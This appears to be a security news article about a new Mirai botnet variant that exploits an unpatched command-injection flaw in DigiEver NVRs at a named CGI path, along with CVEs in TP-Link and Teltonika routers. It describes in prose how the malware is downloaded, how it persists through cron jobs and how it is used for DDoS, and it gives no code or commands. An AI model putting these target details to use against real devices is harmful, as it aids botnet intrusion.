New Mirai Variant Unleashes Wave of Attacks on IoT devices
A newly discovered Mirai-based botnet is exploiting previously unpatched vulnerabilities in a range of internet-connected devices, including DigiEver DS-2105 Pro Network Video Recorders (NVRs), TP-Link routers, adn Teltonika RUT9XX routers. The campaign, which began in September and intensified in November, highlights the ongoing threat posed by IoT vulnerabilities and the persistent evolution of malware.
The attacks leverage a previously documented, yet unpatched, remote code execution (RCE) vulnerability in DigiEver NVRs, targeting the ‘/cgi-bin/cgi_main.cgi’ URI. This vulnerability, similar to one presented by TXOne researcher Ta-Lun Yen at DefCamp 2022 in Bucharest, Romania, allows attackers to inject malicious commands through improperly validated user inputs. “The issue affects multiple DVR devices,” Yen stated at the conference. A video of his presentation is available here.
exploiting Multiple Vulnerabilities
Beyond the DigiEver flaw, this refined Mirai variant also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. This multi-pronged approach demonstrates the botnet’s adaptability and its operators’ commitment to maximizing their reach.
Akamai researchers,who first observed the intensified attacks in mid-November,describe the malware as notable for its use of XOR and ChaCha20 encryption and its broad targeting of x86,ARM,and MIPS system architectures. “Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai in their report. “This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original mirai malware source code release,” they add.
The Attack Methodology
The attackers utilize command injection to download the malware binary from a remote server, establishing persistence through the addition of cron jobs. Once compromised, devices are used for distributed denial-of-service (DDoS) attacks or to further spread the malware using exploit sets and stolen credentials. This highlights the cascading effect of a single vulnerability, potentially impacting countless devices and networks.
Indicators of compromise (IoCs) and Yara rules for detection and blocking are available in the Akamai report. The timely patching of vulnerabilities and the implementation of robust security measures are crucial in mitigating the risk of such attacks. For U.S. consumers, this underscores the importance of regularly updating firmware on all internet-connected devices and practicing good cybersecurity hygiene.